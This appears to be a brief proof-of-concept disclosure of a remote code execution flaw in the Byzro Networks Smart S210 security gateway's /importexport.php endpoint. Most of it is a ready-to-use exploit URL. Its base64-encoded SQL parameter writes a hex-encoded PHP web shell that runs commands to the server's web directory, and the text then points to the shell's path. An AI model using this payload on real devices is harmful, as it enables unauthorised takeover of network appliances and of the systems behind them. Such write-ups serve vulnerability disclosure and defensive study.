There is an RCE vulnerability in the intelligent management platform of Byzro Networks Smart S210 multi-service security gateway.
version:S210
-
Vulnerability location /importexport.php
-
The login interface is as shown in the figure.
-
Construct POC and execute download
https://ip:port/importexport.php?sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvc2VjLnBocCc=&type=exportexcelbysql
-
Visit /app/sec.php to get the webshell.
